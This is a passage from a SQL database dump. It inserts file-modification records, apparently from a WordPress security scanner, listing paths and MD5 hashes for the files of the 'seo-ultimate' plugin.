(0xa6c6e9e96b55accdf2af6d0adfafa97f, 'wp-content/plugins/seo-ultimate/includes/encoder.js', 1, 0x00000000000000000000000000000000, 0xc0b53ce8416057828200eccc53c5485d),
(0xf1f904724738fa2564aaac504946eb00, 'wp-content/plugins/seo-ultimate/includes/index.php', 1, 0x00000000000000000000000000000000, 0x4968acc0f7e0e413c6adb0b629cf378e),
(0x152c985d7b0434ffe8099df387f35900, 'wp-content/plugins/seo-ultimate/includes/jlfunctions/arr.php', 1, 0x00000000000000000000000000000000, 0xedd930e1a8741725a4bddfcdba5e136c),
(0xe0e001fed03b447ebff151485c523413, 'wp-content/plugins/seo-ultimate/includes/jlfunctions/html.php', 1, 0x00000000000000000000000000000000, 0xdc6521a0b1f3dbba1832a88bf7088b92),
(0xddcd3bc9ba9fd0524a7ded9915980c35, 'wp-content/plugins/seo-ultimate/includes/jlfunctions/index.php', 1, 0x00000000000000000000000000000000, 0x4968acc0f7e0e413c6adb0b629cf378e),
(0xf06e0b14f80dc25a14e939b0a28d6aa1, 'wp-content/plugins/seo-ultimate/includes/jlfunctions/io.php', 1, 0x00000000000000000000000000000000, 0xdad7f25ddde5ec6de3773527cfc12b47),
(0x290e3b98e3f2c7ecb1fbca8d88c70143, 'wp-content/plugins/seo-ultimate/includes/jlfunctions/jlfunctions.php', 1, 0x00000000000000000000000000000000, 0xd01827c55672813fbc7fbdb13588ed09),
(0x284cbcd1226586801aecba8ab096d833, 'wp-content/plugins/seo-ultimate/includes/jlfunctions/num.php', 1, 0x00000000000000000000000000000000, 0x2b887b956109d52d11eaac2adac17a10),
(0x697a994b0909c1113f6a36d9995b0878, 'wp-content/plugins/seo-ultimate/includes/jlfunctions/str.php', 1, 0x00000000000000000000000000000000, 0x50c6c4345c59980062876322449eccfb),
(0xc365c7c79dbbc7cc9c5d4a944a83cb1b, 'wp-content/plugins/seo-ultimate/includes/jlfunctions/url.php', 1, 0x00000000000000000000000000000000, 0x8f7febbc61afc8eeb616baa7baf6c289),
(0x514be13d21ad98fb7c2764748cf78a87, 'wp-content/plugins/seo-ultimate/includes/jlfunctions/web.php', 1, 0x00000000000000000000000000000000, 0x5e9f176a78641da404ff8c27478d34ca),
(0xcdbd31b9909318874659e79252288696, 'wp-content/plugins/seo-ultimate/includes/jlsuggest/jlsuggest.css', 1, 0x00000000000000000000000000000000, 0xe3813fbd68f38e733273bd9af340eb2c);
INSERT INTO `www2_wfFileMods` (`filenameMD5`, `filename`, `knownFile`, `oldMD5`, `newMD5`) VALUES
(0xb2e53c35061e552e667614e31eb1f4c9, 'wp-content/plugins/seo-ultimate/includes/jlsuggest/jlsuggest.js', 1, 0x00000000000000000000000000000000, 0x6769510f92922cf15ddf66308e6a17e3),
(0x8ea43197757593027b09d0d73c751280, 'wp-content/plugins/seo-ultimate/includes/jlsuggest/loading.gif', 1, 0x00000000000000000000000000000000, 0x9a8269421303631316be4ab5e34870e1),
(0x7dc417a2bb97edff99f79eea58ee1abe, 'wp-content/plugins/seo-ultimate/includes/jlwp/functions.php', 1, 0x00000000000000000000000000000000, 0x1363d824bd0e75d41a9e80c46559c202),
(0x8d7491066f82042160dd08ac6ef1a261, 'wp-content/plugins/seo-ultimate/includes/jlwp/index.php', 1, 0x00000000000000000000000000000000, 0x4968acc0f7e0e413c6adb0b629cf378e),
(0x08c7fa42ddcfa83bf767ac6c477f113b, 'wp-content/plugins/seo-ultimate/includes/jlwp/jlwp.php', 1, 0x00000000000000000000000000000000, 0xe821e9ff9982195e8213d14d2607adc4),
(0x3c8fabd3b7fdfb224e9e7049a2820cb3, 'wp-content/plugins/seo-ultimate/includes/tabs.js', 1, 0x00000000000000000000000000000000, 0x4fba87a6751d75f9ee871cae0933b272),
(0x3a370586bf9398155e52e197a8d848b0, 'wp-content/plugins/seo-ultimate/index.php', 1, 0x00000000000000000000000000000000, 0x4968acc0f7e0e413c6adb0b629cf378e),
(0xbc2f4fcbbd61825f1b91e7efcef0e970, 'wp-content/plugins/seo-ultimate/modules/404s/fofs-log.php', 1, 0x00000000000000000000000000000000, 0xec93e8d18cbd6b6950e7f1208698060e),
(0x35863f0c4fa169612252298938117507, 'wp-content/plugins/seo-ultimate/modules/404s/fofs-settings.php', 1, 0x00000000000000000000000000000000, 0x0bd7578617e20eb6218ec063801d5f24),
(0xa5f067d0326275d58d1511477d7501d1, 'wp-content/plugins/seo-ultimate/modules/404s/fofs.css', 1, 0x00000000000000000000000000000000, 0x4f19e8f8a9963e87922881326ccc5e0b),
(0x397a8627e78b3727125f99d53daea120, 'wp-content/plugins/seo-ultimate/modules/404s/fofs.php', 1, 0x00000000000000000000000000000000, 0xa31f5ed2e3320c38eff2d0ebd37b26ff),
(0x8b6dcf20a7542b3368e5d06fd9fafffa, 'wp-content/plugins/seo-ultimate/modules/404s/hit-cache.png', 1, 0x00000000000000000000000000000000, 0xb139ed675fdbdca56f0d73121f36f836),
(0x6a6d5e3138617b97cc5b729f7b263b49, 'wp-content/plugins/seo-ultimate/modules/404s/hit-delete.png', 1, 0x00000000000000000000000000000000, 0x68461ca5187cd2c6af08786467085f2b),
(0x4ec34e221a94ccd3fb18e5f202c87750, 'wp-content/plugins/seo-ultimate/modules/404s/hit-details.png', 1, 0x00000000000000000000000000000000, 0x11c8f930b5b2db98dad42209e0b2bccb),
(0xaef2e50a3ac85dc89b8074c9f5ecede3, 'wp-content/plugins/seo-ultimate/modules/404s/hit-open.png', 1, 0x00000000000000000000000000000000, 0x2f31b7333e57fcb11f281137886ea7ae),
(0xe837ddd5c42a367f2039dfff0b741c28, 'wp-content/plugins/seo-ultimate/modules/404s/hit-redirect.png', 1, 0x00000000000000000000000000000000, 0x51b1852b1cc6ca82d745f7f6d5d5218d),
(0x81c7a5e92414eb851ae2f2bd2417a5a4, 'wp-content/plugins/seo-ultimate/modules/404s/index.php', 1, 0x00000000000000000000000000000000, 0x4968acc0f7e0e413c6adb0b629cf378e),
(0x88e7f1fc16d3a0d809ea4c0ee2189d7b, 'wp-content/plugins/seo-ultimate/modules/author-links/author-links.php', 1, 0x00000000000000000000000000000000, 0x9200ffb896f24448aa4405cde9329fc5),
(0xf5a506a18451c00d6e963f27448048d1, 'wp-content/plugins/seo-ultimate/modules/author-links/index.php', 1, 0x00000000000000000000000000000000, 0x4968acc0f7e0e413c6adb0b629cf378e),
(0x7c5776ec780740671091d41741731f6a, 'wp-content/plugins/seo-ultimate/modules/autolinks/autolinks.css', 1, 0x00000000000000000000000000000000, 0x779eccef21899659a174c2beb1b2ec5e),
(0x811a9e67b2797a90f79fc2f4e9bd89dc, 'wp-content/plugins/seo-ultimate/modules/autolinks/autolinks.php', 1, 0x00000000000000000000000000000000, 0xf6ccec50d7c01e6dab65f8dd5394afd0),
(0x48147a01bc4640d24f2f94d6bbde345a, 'wp-content/plugins/seo-ultimate/modules/autolinks/content-autolinks-settings.php', 1, 0x00000000000000000000000000000000, 0xcc34d54813f3b1105837238d0bfeee6e),
(0x8c0ae13ad462e3361841fa2dc41cef3a, 'wp-content/plugins/seo-ultimate/modules/autolinks/content-autolinks.php', 1, 0x00000000000000000000000000000000, 0x00e01e333b28bab1e59a294b6db8078b),
(0x83a6d01d7bbd0df6b3190b22bf904b96, 'wp-content/plugins/seo-ultimate/modules/autolinks/footer-autolinks-settings.php', 1, 0x00000000000000000000000000000000, 0x6d3cdebd1f5b20cad602a4dc64f9266e),
(0x64ba6accbd4f3a7b561dc044f4b2802b, 'wp-content/plugins/seo-ultimate/modules/autolinks/footer-autolinks.php', 1, 0x00000000000000000000000000000000, 0x94d26dcf5b9cdd7f01650f527765581d),
(0x9af1b1bdc3a7d6c5deebd421a6e404bb, 'wp-content/plugins/seo-ultimate/modules/autolinks/index.php', 1, 0x00000000000000000000000000000000, 0x4968acc0f7e0e413c6adb0b629cf378e),
(0xe69af92274525f9b360caa4283e57be9, 'wp-content/plugins/seo-ultimate/modules/canonical/canonical.php', 1, 0x00000000000000000000000000000000, 0x18876ac78854a42d57feee4e2afaae3b),
(0x11167af27549ed4ec7dba3a3f1ba3030, 'wp-content/plugins/seo-ultimate/modules/canonical/index.php', 1, 0x00000000000000000000000000000000, 0x4968acc0f7e0e413c6adb0b629cf378e),
(0x3086abd21ef5c7b68817ed30b0526e4b, 'wp-content/plugins/seo-ultimate/modules/class.su-importmodule.php', 1, 0x00000000000000000000000000000000, 0xd4ad9559ef2bcf4fc5e77d393df30ba1),
(0x9d625fe04a0d2e2e8c46854cb94e79c0, 'wp-content/plugins/seo-ultimate/modules/class.su-module.php', 1, 0x00000000000000000000000000000000, 0x8db5102c61e8fb005326acc1f21f82d5),
(0x33f4be23986a77db1d916be718f6d831, 'wp-content/plugins/seo-ultimate/modules/files/files.php', 1, 0x00000000000000000000000000000000, 0xb777d5a88e829ad24dbcb92075aa06e1),
(0xcde39c54ee1c492b37a757f68992e1d4, 'wp-content/plugins/seo-ultimate/modules/files/index.php', 1, 0x00000000000000000000000000000000, 0x4968acc0f7e0e413c6adb0b629cf378e),
(0xce908b49109b3a5bc567aa77c99ac633, 'wp-content/plugins/seo-ultimate/modules/import-aiosp/import-aiosp.php', 1, 0x00000000000000000000000000000000, 0xf5982daa3d8eab150182e4dcc8814433),
(0xa0e32852e11fe24f5d71baf82765f4af, 'wp-content/plugins/seo-ultimate/modules/import-aiosp/index.php', 1, 0x00000000000000000000000000000000, 0x4968acc0f7e0e413c6adb0b629cf378e),
(0xd9540ee5ee8d6ddb859a17768f3f46a0, 'wp-content/plugins/seo-ultimate/modules/index.php', 1, 0x00000000000000000000000000000000, 0x4968acc0f7e0e413c6adb0b629cf378e),
(0x86d97b50b5791aba1595a3b1e8e26dd4, 'wp-content/plugins/seo-ultimate/modules/internal-link-aliases/index.php', 1, 0x00000000000000000000000000000000, 0x4968acc0f7e0e413c6adb0b629cf378e),
(0xd76823251c0422d711b6d528b21e7647, 'wp-content/plugins/seo-ultimate/modules/internal-link-aliases/internal-link-aliases.css', 1, 0x00000000000000000000000000000000, 0x09621dd61ab561c84687f0871402eef2),
(0x9e4dffc9d5cda0939a99fc99ad680c79, 'wp-content/plugins/seo-ultimate/modules/internal-link-aliases/internal-link-aliases.php', 1, 0x00000000000000000000000000000000, 0xc8272d2ea52694fe7db272ffa024215e),
(0x25953afef743dc49b15370e0683ed23a, 'wp-content/plugins/seo-ultimate/modules/link-nofollow/index.php', 1, 0x00000000000000000000000000000000, 0x4968acc0f7e0e413c6adb0b629cf378e),
(0x9f26db72eebbb2761fb081446dfd8ffa, 'wp-content/plugins/seo-ultimate/modules/link-nofollow/link-nofollow.php', 1, 0x00000000000000000000000000000000, 0x7f9188173f727770d8957b2f5fd2030c),
(0x7b1be5a6db9a1cf66be9c27fa89bced8, 'wp-content/plugins/seo-ultimate/modules/linkbox/index.php', 1, 0x00000000000000000000000000000000, 0x4968acc0f7e0e413c6adb0b629cf378e),
(0x282143d7a6dc1a4bae7bf27c1d2b077b, 'wp-content/plugins/seo-ultimate/modules/linkbox/linkbox.css', 1, 0x00000000000000000000000000000000, 0x831f536a945e253d5b50042db4ee377f),
(0x18f5930a33623a0072f42ec3b2dc07eb, 'wp-content/plugins/seo-ultimate/modules/linkbox/linkbox.php', 1, 0x00000000000000000000000000000000, 0x082cd1e9b9a0aeaccf44468c48f328c6),
(0x30e5a6eb29fda78367179cf5a0cc4347, 'wp-content/plugins/seo-ultimate/modules/meta/index.php', 1, 0x00000000000000000000000000000000, 0x4968acc0f7e0e413c6adb0b629cf378e),
(0xa3f8ebda49755158969cc7a45a121dc4, 'wp-content/plugins/seo-ultimate/modules/meta/meta-descriptions.css', 1, 0x00000000000000000000000000000000, 0xf2010ae777d0112cb4cbb0fd0eb705c9),
(0xa28a39e2e2d9578a52783864199cc824, 'wp-content/plugins/seo-ultimate/modules/meta/meta-descriptions.php', 1, 0x00000000000000000000000000000000, 0x39e0a44f5c601c769515c1dd0bc8ec5c),
(0x76ec7e414ce5fb0c9df4d3f3dfbf42fd, 'wp-content/plugins/seo-ultimate/modules/meta/meta-keywords.php', 1, 0x00000000000000000000000000000000, 0x8d30bf4951ab6cba5a97d44b7d9b9704),
(0x3cc4cc5912c57696d3884defaf045375, 'wp-content/plugins/seo-ultimate/modules/meta/meta-robots.css', 1, 0x00000000000000000000000000000000, 0x2f203fd3a45bb6f77fb91bdcc75f5370),
(0xd2c59c293850195be54c97912f09b2c2, 'wp-content/plugins/seo-ultimate/modules/meta/meta-robots.php', 1, 0x00000000000000000000000000000000, 0xf1bbc430e5f6a0b860bdffd45f849bf6),
(0xfafdde88404a4b4346fbafd384826b2a, 'wp-content/plugins/seo-ultimate/modules/meta/webmaster-verify.css', 1, 0x00000000000000000000000000000000, 0x38887f4f064e4d9fa614e980d7ed725c),
(0xeac4904c34fcf580808760e515171839, 'wp-content/plugins/seo-ultimate/modules/meta/webmaster-verify.php', 1, 0x00000000000000000000000000000000, 0x239a6f11f46d0209cc54c3a0c04533ba),
(0xeb7670cbcc048afe359de0bbca213a57, 'wp-content/plugins/seo-ultimate/modules/misc/index.php', 1, 0x00000000000000000000000000000000, 0x4968acc0f7e0e413c6adb0b629cf378e),
(0xcc3d87a3e487f1bf5db4d40bf7b75c6b, 'wp-content/plugins/seo-ultimate/modules/misc/misc.php', 1, 0x00000000000000000000000000000000, 0xce8e375f84970700c31e9abc6509ac79),
(0xa80b6b69daf326f7f7d3c856acf8be4c, 'wp-content/plugins/seo-ultimate/modules/modules/index.php', 1, 0x00000000000000000000000000000000, 0x4968acc0f7e0e413c6adb0b629cf378e),
(0x88a52daa21ba37cc095ec42d2ef18c68, 'wp-content/plugins/seo-ultimate/modules/modules/modules.css', 1, 0x00000000000000000000000000000000, 0x00eb2fc3fb8dc8329693114d045b0312),
(0x182884a0b6cbdaa3cffb4f544a5d41a0, 'wp-content/plugins/seo-ultimate/modules/modules/modules.js', 1, 0x00000000000000000000000000000000, 0x0b0ad65e912f0e8c9cdab5f2c2d6e7ce),
(0x9aadeb0c263a4d87d8fc6122701f91d0, 'wp-content/plugins/seo-ultimate/modules/modules/modules.php', 1, 0x00000000000000000000000000000000, 0x031e56bf79453ed672f473fdb6cf7bab),
(0xb9e244fa4aab2c28ba1e1f2ea22b9895, 'wp-content/plugins/seo-ultimate/modules/modules.css', 1, 0x00000000000000000000000000000000, 0xf4985ba0f93aec55d558a26f10c84929),
(0x085d2aa6cd247247eb87d324edfe474f, 'wp-content/plugins/seo-ultimate/modules/modules.js', 1, 0x00000000000000000000000000000000, 0x7b812121cbd24de42642bf422b3a9595),
(0x20362403547a4a882f9dd71abd457080, 'wp-content/plugins/seo-ultimate/modules/more-links/index.php', 1, 0x00000000000000000000000000000000, 0x4968acc0f7e0e413c6adb0b629cf378e),
(0x7bfe36d084e4f6e6d69cb79560ee3152, 'wp-content/plugins/seo-ultimate/modules/more-links/more-links.php', 1, 0x00000000000000000000000000000000, 0x6186c8fb7b0b2049d1853c64ec208f71),
(0x9d8c9fae628243298f67e58afb1a1fe7, 'wp-content/plugins/seo-ultimate/modules/noindex/index.php', 1, 0x00000000000000000000000000000000, 0x4968acc0f7e0e413c6adb0b629cf378e),
(0x0b4c8829d50975f5554513f617e663e4, 'wp-content/plugins/seo-ultimate/modules/noindex/noindex.php', 1, 0x00000000000000000000000000000000, 0xf39cb4ee7e3c7afad8218a4d13c94371),
(0x8685ac28ef53c514cd100d4d2e710441, 'wp-content/plugins/seo-ultimate/modules/opengraph/index.php', 1, 0x00000000000000000000000000000000, 0x4968acc0f7e0e413c6adb0b629cf378e),
(0x18a607c49c74a70b4a3b30c15497cfd5, 'wp-content/plugins/seo-ultimate/modules/opengraph/opengraph.css', 1, 0x00000000000000000000000000000000, 0x59790796a20330c057f511963c6bbd3d),
(0x47728da0554e360a1490ab463c756266, 'wp-content/plugins/seo-ultimate/modules/opengraph/opengraph.php', 1, 0x00000000000000000000000000000000, 0x69507a9150194a1e904ed7932c2a4fa3),
(0x3caff2592246b2598aa97dc16295b02e, 'wp-content/plugins/seo-ultimate/modules/permalinks/index.php', 1, 0x00000000000000000000000000000000, 0x4968acc0f7e0e413c6adb0b629cf378e),
(0xccac92799f9602d6fcacd88f9adfa4f0, 'wp-content/plugins/seo-ultimate/modules/permalinks/permalinks.css', 1, 0x00000000000000000000000000000000, 0xbbf69cfa75ddbee8f37ee5b66c8ac6da),
(0xbf7f477036d241fc0585bcfaa542c410, 'wp-content/plugins/seo-ultimate/modules/permalinks/permalinks.php', 1, 0x00000000000000000000000000000000, 0x9276d40c0d847cbf372dfc3468f9e41a),
(0xec6d279f7d96072036f56f7974ac0d15, 'wp-content/plugins/seo-ultimate/modules/rich-snippets/index.php', 1, 0x00000000000000000000000000000000, 0x4968acc0f7e0e413c6adb0b629cf378e),
(0x00135334995644255f39e8be46a48ccb, 'wp-content/plugins/seo-ultimate/modules/rich-snippets/rich-snippets.php', 1, 0x00000000000000000000000000000000, 0x9d85b4181e2de4bec9efab3d332e2c82),
(0x369de66b9f1f6068c3461bfa1137fb09, 'wp-content/plugins/seo-ultimate/modules/sds-blog/index.php', 1, 0x00000000000000000000000000000000, 0x4968acc0f7e0e413c6adb0b629cf378e),
(0x4fcb507f24dd2d5eb43806682fe8df43, 'wp-content/plugins/seo-ultimate/modules/sds-blog/sds-blog.css', 1, 0x00000000000000000000000000000000, 0xf78f9b4fe0d4e38161ef1be5eaedd7bc),
(0xfb1fdfdf709aebaee68fbc832b680d8e, 'wp-content/plugins/seo-ultimate/modules/sds-blog/sds-blog.php', 1, 0x00000000000000000000000000000000, 0x217c2cefd249981a7df688eb4d35681c),
(0xd4c2c85a7145f146c890fd7ecaca7700, 'wp-content/plugins/seo-ultimate/modules/settings/global-settings.php', 1, 0x00000000000000000000000000000000, 0xe215cafe3a3fe055a56dc6f7b53e1ffa),
(0xa17f3c9ed2e35c1be3ae06a2645827b1, 'wp-content/plugins/seo-ultimate/modules/settings/index.php', 1, 0x00000000000000000000000000000000, 0x4968acc0f7e0e413c6adb0b629cf378e),
(0xc5fc7f6e80485a727d55a0d35ce339aa, 'wp-content/plugins/seo-ultimate/modules/settings/install.css', 1, 0x00000000000000000000000000000000, 0xae791b1ac05aaa0b64b97b46eb155c5c),
(0xb1347fe758f5a3fa46cbcafc6a1d5315, 'wp-content/plugins/seo-ultimate/modules/settings/install.php', 1, 0x00000000000000000000000000000000, 0x166fc6040902a651c06d5a86fac615af),
(0x377f827862eb47a269ce9b025fc89f5b, 'wp-content/plugins/seo-ultimate/modules/settings/settings-data.css', 1, 0x00000000000000000000000000000000, 0x455bddbd802bb752dc9d5cda86d03759),
(0x15d1a8331e911c2c275762291c8ec22d, 'wp-content/plugins/seo-ultimate/modules/settings/settings-data.php', 1, 0x00000000000000000000000000000000, 0xac296eae5ff3cdcb355e20aa584344df),
(0xfe63cf220cccdaed4604754dab291ddd, 'wp-content/plugins/seo-ultimate/modules/settings/settings.php', 1, 0x00000000000000000000000000000000, 0xc68966d372de98c62f57ff76c13d264c),
(0x608bbf242a8be9b939f55aaa0803781d, 'wp-content/plugins/seo-ultimate/modules/settings/uninstall.php', 1, 0x00000000000000000000000000000000, 0x59019b6b485497662f86defe3b3c32a5),
(0x466e27d6a27ed4bbda7983a5f5084198, 'wp-content/plugins/seo-ultimate/modules/sharing-buttons/index.php', 1, 0x00000000000000000000000000000000, 0x4968acc0f7e0e413c6adb0b629cf378e),
(0x9b88ab4a3bb3e9534076e7f56442229b, 'wp-content/plugins/seo-ultimate/modules/sharing-buttons/sharing-buttons.css', 1, 0x00000000000000000000000000000000, 0xee016dc970c980a57254d325dbdec9cc),
(0x4b5fd3498be989a3ea8fed2fc929908c, 'wp-content/plugins/seo-ultimate/modules/sharing-buttons/sharing-buttons.php', 1, 0x00000000000000000000000000000000, 0xc86292ce0d01f9df95982d882f6f296d),
(0x41bc81fe500fc67d686f08337c1bbfee, 'wp-content/plugins/seo-ultimate/modules/slugs/index.php', 1, 0x00000000000000000000000000000000, 0x4968acc0f7e0e413c6adb0b629cf378e),
(0x7f643945b545cad756597104b51dd9c7, 'wp-content/plugins/seo-ultimate/modules/slugs/slugs.php', 1, 0x00000000000000000000000000000000, 0xc63a21ce643f0485d1df54405c997c31),
(0xddd1e1aeb80d0e3595846cc134b6591a, 'wp-content/plugins/seo-ultimate/modules/titles/index.php', 1, 0x00000000000000000000000000000000, 0x4968acc0f7e0e413c6adb0b629cf378e),
(0x9bc505036047ec1f4bf64a85c54eb939, 'wp-content/plugins/seo-ultimate/modules/titles/titles.php', 1, 0x00000000000000000000000000000000, 0x605837038b9225ce17e0c8679b522977),
(0x82384f617f3ec1926c05c5984c5884f1, 'wp-content/plugins/seo-ultimate/modules/user-code/index.php', 1, 0x00000000000000000000000000000000, 0x4968acc0f7e0e413c6adb0b629cf378e),
(0x4ea95a5d9e31ec25f7800f55af035044, 'wp-content/plugins/seo-ultimate/modules/user-code/user-code.php', 1, 0x00000000000000000000000000000000, 0x6e6f3d9350e4db89fc6a10dc94949484),
(0x3712803c820b752be48655f19099d581, 'wp-content/plugins/seo-ultimate/modules/widgets/index.php', 1, 0x00000000000000000000000000000000, 0x4968acc0f7e0e413c6adb0b629cf378e),
(0xa56a43b04e06fb15e0bf30c6ac4d79ca, 'wp-content/plugins/seo-ultimate/modules/widgets/widgets.php', 1, 0x00000000000000000000000000000000, 0xb04e04514828be76c1f4806855c34461),
(0xdd3e2b3e5a5e66759fd5954c8fbc36ba, 'wp-content/plugins/seo-ultimate/modules/wp-settings/index.php', 1, 0x00000000000000000000000000000000, 0x4968acc0f7e0e413c6adb0b629cf378e),
(0x99a21a9a40ead4e344b18ebcb054b9e6, 'wp-content/plugins/seo-ultimate/modules/wp-settings/wp-settings.php', 1, 0x00000000000000000000000000000000, 0xe76e3860ca6f89cbe60c34453621f111),
(0x7cb4cf5d551c4dbc450ac9881ae01fd7, 'wp-content/plugins/seo-ultimate/plugin/class.seo-ultimate.php', 1, 0x00000000000000000000000000000000, 0x3a8cba4016e1ba42b834060d3207d843),
(0x22d58f52151816e21feec98d32d62f15, 'wp-content/plugins/seo-ultimate/plugin/class.su-installer.php', 1, 0x00000000000000000000000000000000, 0xbea0451fe8bc88f1fc784188a39456d6),
(0x671e3c408552dcb4195f0f3fdd9d0a5b, 'wp-content/plugins/seo-ultimate/plugin/global.css', 1, 0x00000000000000000000000000000000, 0x9c66bc382616af58db406a23ec3fe5a9),
(0x8b599b4ce9cb31d38b149c83f3b907fe, 'wp-content/plugins/seo-ultimate/plugin/global.js', 1, 0x00000000000000000000000000000000, 0x9902008d41ec840384e09d4ea7e817e6),
(0x914db4606aec27f8b07099790ecb0035, 'wp-content/plugins/seo-ultimate/plugin/images/error.png', 1, 0x00000000000000000000000000000000, 0xe4dd51f46566ed3ceacdc900bf2fdf01),
(0x55f228db6ad11b1c446d0c3eb4b83034, 'wp-content/plugins/seo-ultimate/plugin/images/icon.png', 1, 0x00000000000000000000000000000000, 0x9618d60d6ae956f263258d279dd1ceac),
(0xc6c771be0274917a58916e71f10012a6, 'wp-content/plugins/seo-ultimate/plugin/images/index.php', 1, 0x00000000000000000000000000000000, 0x4968acc0f7e0e413c6adb0b629cf378e),
(0x80895af7b3ae53fe43d2ddc61a1404e1, 'wp-content/plugins/seo-ultimate/plugin/images/info.png', 1, 0x00000000000000000000000000000000, 0x3750c701d2ec35a45d289b9b9c1a0667),
(0xfbe04b32b6b8950a2cf6515bb0a04d73, 'wp-content/plugins/seo-ultimate/plugin/images/sds-logo.png', 1, 0x00000000000000000000000000000000, 0xe95c01aa4fa2be222149a61a8487abdb),
(0x67caadb3be8b4b4d3bba2e1e90c60953, 'wp-content/plugins/seo-ultimate/plugin/images/seo.png', 1, 0x00000000000000000000000000000000, 0x05ca48f89822be2e26e8eb2124e09ea5),
(0xb0559951ca900c82f54941d0a9dc7637, 'wp-content/plugins/seo-ultimate/plugin/images/success.png', 1, 0x00000000000000000000000000000000, 0x8bfed48756f192ed7afe6eaa4799aae4),
(0x2334fce107f1c15f10cff8f40b80183d, 'wp-content/plugins/seo-ultimate/plugin/images/warning.png', 1, 0x00000000000000000000000000000000, 0xc847e1076da70df83ef5284622b82a74),
(0x153daff1780d4a5f8a8a98ff8665d874, 'wp-content/plugins/seo-ultimate/plugin/images/wp-ultimate.gif', 1, 0x00000000000000000000000000000000, 0xefc658c2c484c7bf7af5158175511f38),
(0x41c52db662e338d57c8740d15583b450, 'wp-content/plugins/seo-ultimate/plugin/index.php', 1, 0x00000000000000000000000000000000, 0x4968acc0f7e0e413c6adb0b629cf378e),
(0x5d02775cce6db8b90bc2a7861f33799e, 'wp-content/plugins/seo-ultimate/plugin/su-constants.php', 1, 0x00000000000000000000000000000000, 0x9972cdff5cb92310bb5670ce990eeff4),
(0xf8885f9e9c0d2cb55ad55cb4c5758e49, 'wp-content/plugins/seo-ultimate/plugin/su-functions.php', 1, 0x00000000000000000000000000000000, 0x739366b68da2884966ce6d49a6108246),
(0x52721420e9b0e8848b5433b4ea6aa5ec, 'wp-content/plugins/seo-ultimate/readme.txt', 1, 0x00000000000000000000000000000000, 0x327c226574a4f488d27a4fbe98ae1c58),
(0xf855c905957c46d8f52a3a73d5111916, 'wp-content/plugins/seo-ultimate/screenshot-1.png', 1, 0x00000000000000000000000000000000, 0xbb6125da76ae0310b13c965e2a13fc5c),
(0x0f89b28ae651c041c0e2e5c3887680d3, 'wp-content/plugins/seo-ultimate/screenshot-10.png', 1, 0x00000000000000000000000000000000, 0x7ea061c85aafd744ef122cdb5fbfb370),
(0xb7982df8752337aae55c6d6ee818623b, 'wp-content/plugins/seo-ultimate/screenshot-11.png', 1, 0x00000000000000000000000000000000, 0xdf51bbc87c48c0ea09a97ab9d6d9639d),
(0xf6be4ae66961055ae1f6a07e77462404, 'wp-content/plugins/seo-ultimate/screenshot-12.png', 1, 0x00000000000000000000000000000000, 0xbcb46af015dc5193173edc04a5edbcd3),
(0x6b7d8018fc017cfe05160c412a35b6e0, 'wp-content/plugins/seo-ultimate/screenshot-13.png', 1, 0x00000000000000000000000000000000, 0x3394c5f2d21f61c1e6d21153a7499c04),
(0x24423936972784ca8123ca87ef2f2ad5, 'wp-content/plugins/seo-ultimate/screenshot-14.png', 1, 0x00000000000000000000000000000000, 0xad9ed675ec29b4091970585f39521cb1),
(0x962d8edcf265c0e31c4b5fe55e4342a3, 'wp-content/plugins/seo-ultimate/screenshot-15.png', 1, 0x00000000000000000000000000000000, 0x8a1e85368e2d204ff8fc14938b2eba98),
(0x5ea5850bb8a5d740d7bfd75f1a339d8a, 'wp-content/plugins/seo-ultimate/screenshot-16.png', 1, 0x00000000000000000000000000000000, 0xf3a4b94d1c99aa9d9bbf887e1b596018),
(0x81e17a98f64572b3d3aa200d11e543b1, 'wp-content/plugins/seo-ultimate/screenshot-17.png', 1, 0x00000000000000000000000000000000, 0x5c5d49c8f466abae1fcc6bc3e9b29738),
(0x3897ec35e718d18d5084cdd515cb4741, 'wp-content/plugins/seo-ultimate/screenshot-18.png', 1, 0x00000000000000000000000000000000, 0xe3bb5e928c158281c5018fcc87fe6c6a),
(0x2491c25c38c6b73e32719ee9d63cfa5f, 'wp-content/plugins/seo-ultimate/screenshot-19.png', 1, 0x00000000000000000000000000000000, 0xdcbf266a1cabbbcd0e533149d693ecd6),
(0x29875aea3d0d72d6b08e28e19ade09b9, 'wp-content/plugins/seo-ultimate/screenshot-2.png', 1, 0x00000000000000000000000000000000, 0xcf9295ee48a5e78022f96b7dce261433),
(0x1f2e50177e9b9060ca6ca6cd80c26a3e, 'wp-content/plugins/seo-ultimate/screenshot-20.png', 1, 0x00000000000000000000000000000000, 0x3d2b8bb2d5a6d5cc44d784321858ecaa),
(0x6795464ba16c34af5b8cd132aaf3f672, 'wp-content/plugins/seo-ultimate/screenshot-21.png', 1, 0x00000000000000000000000000000000, 0x685148f8a8be7f2146a48416bf69a727),
(0xde1136b9dc06d72a11400384b7a1b268, 'wp-content/plugins/seo-ultimate/screenshot-22.png', 1, 0x00000000000000000000000000000000, 0xd16aa62de10827c68978747afa0070f3),
(0x76fde56f2d449008de91f97ca40f8393, 'wp-content/plugins/seo-ultimate/screenshot-23.png', 1, 0x00000000000000000000000000000000, 0xac8f8e44d0bc233ad86f02e6ba08a485),
(0x6c3972754349ab846bfa57aa5dff279e, 'wp-content/plugins/seo-ultimate/screenshot-24.png', 1, 0x00000000000000000000000000000000, 0xcce35301ce7fdddb7b2c8a45af32ff82),
(0xa290291785ae199bab1353f34ef23139, 'wp-content/plugins/seo-ultimate/screenshot-3.png', 1, 0x00000000000000000000000000000000, 0x61ba250474ca8469635ef4b58a37e81c),
(0x624effabcd4dbbfae3cc9ab65ee199d4, 'wp-content/plugins/seo-ultimate/screenshot-4.png', 1, 0x00000000000000000000000000000000, 0x81da7282a4cd1887eed5f0e7d47c2670),
(0x7ca7572183b3cbe4f3c945788738a188, 'wp-content/plugins/seo-ultimate/screenshot-5.png', 1, 0x00000000000000000000000000000000, 0xeea2a5c7c262e8e5fb5531f72a4ac0a2),
(0x7e0974229df48b1e59d6660bf74796a9, 'wp-content/plugins/seo-ultimate/screenshot-6.png', 1, 0x00000000000000000000000000000000, 0x7ddb74bf966b395002c3359e1ac61bfc),
(0x5f3ee3fd6d6de20d18577024e3be5fd4, 'wp-content/plugins/seo-ultimate/screenshot-7.png', 1, 0x00000000000000000000000000000000, 0x5adc58161b32fd329a196aa66e26faef),
(0xf0d5377f346dc71659b59d90562e92bc, 'wp-content/plugins/seo-ultimate/screenshot-8.png', 1, 0x00000000000000000000000000000000, 0x3dfd1264e8d34555bb5f138a87a1ce7b),
